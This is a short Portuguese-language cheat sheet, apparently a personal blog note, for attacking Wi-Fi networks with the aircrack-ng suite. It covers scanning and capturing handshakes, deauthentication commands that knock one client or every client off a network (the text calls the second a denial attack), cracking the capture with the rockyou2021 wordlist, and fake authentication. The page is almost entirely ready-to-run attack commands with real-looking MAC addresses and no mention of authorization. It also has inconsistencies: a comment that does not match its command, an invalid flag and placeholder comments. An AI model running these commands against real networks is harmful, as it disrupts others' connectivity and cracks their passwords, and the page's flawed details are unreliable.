Kali: air

menos que 1 minuto(s) de leitura

AiroDump

Sniffing

Vê os pacotes entre roteadores e devices

Inicialmente vemos as redes possíveis usando o AiroDump.

# Scan Networks
sudo airodump-ng  -i wlan0mon


Escolhe uma rede para “snifar”.

# Captura Pacotes (Attack)
sudo airodump-ng --bssid {mac_address} --channel {channel number} --write {filename}  wlan0mon
sudo airodump-ng --bssid 84:93:B2:E2:87:1B --channel 13 --write ~/Downloads/my_network wlan0mon


Utilizando o AirePlay, em um novo terminal, desautentica!

# Derruba apenas uma conexão (deautenticate 1)
sudo aireplay-ng --deauth 0 -a 84:93:B2:E2:87:1B -c 34:5D:9E:B2:A4:6D wlan0mon

# Irrestrito... derruba tudo, denial attack (deautenticate 0)
sudo aireplay-ng --deauth 0 -a 84:93:B2:E2:87:1B wlan0mon


Para mais informações

sudo aireplay-ng --help


Usando o AirCrack, confronta a captura com uma wordlist.

# ssss
aircrack-ng ~/Downloads/my_network-01.cap -w ~/Documents/Datasets/my_hat/rockyou2021.txt


Abre os pacotes no Wireshark.

# Deautenchicate
airmon-ng start wlan0mon 5 # Define o canal que vai operar!
# ssss
sudo aireplay-ng --fakeauth 30 -a {bssid} -h {macid} wlan0
sudo aireplay-ng --fakeauth 30 -a 98:DA:C4:DD:E4:6C -h 98:39:8E:6B:C1:9B wlan0mon



Referências

Tags:

Categorias: ,

Atualizado em:

Deixe um comentário